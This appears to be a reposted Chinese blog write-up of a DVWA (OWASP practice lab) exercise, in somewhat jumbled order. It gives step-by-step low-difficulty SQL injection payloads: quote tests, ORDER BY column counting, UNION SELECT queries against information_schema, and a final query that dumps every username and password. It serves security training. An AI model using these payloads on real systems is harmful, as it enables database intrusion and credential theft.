OWASP靶场练习
2021-05-30 13:01
标签:image 结构 用户名 concat cat users order 用户 column 1.输入1 2.输入 1‘ and 1=2,报错 3.输入 1‘ and 1=2 #,无报错 方法有两种: -1‘ union select 1, database() # 首先了解information_schema的结构 输入-1‘ union select group_concat(table_name), 2 from information_schema.tables where table_schema = database() #,得到表名 查看user表中的字段 输入 -1‘ union select user, password from users # OWASP靶场练习 标签:image 结构 用户名 concat cat users order 用户 column 原文地址:https://www.cnblogs.com/yellowflag/p/14673293.htmlSQL注入
一、LOW难度SQL注入
1.判断注入类型
得知为字符型注入2.猜字段数
① 1‘ order by N #
② 1‘ union select 1, 2, ... #
采用第一种方法
输入 1‘ order by 2 #无报错
输入 1‘ order by 3 #报错
得知字段数为23.查库名
得到库名为dvwa4.查表和字段
输入 -1‘ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users‘ #
得到user表中的字段
当然也可以使用-1‘ union select group_concat(user), group_concat(password) from users #
得到所有的用户名和密码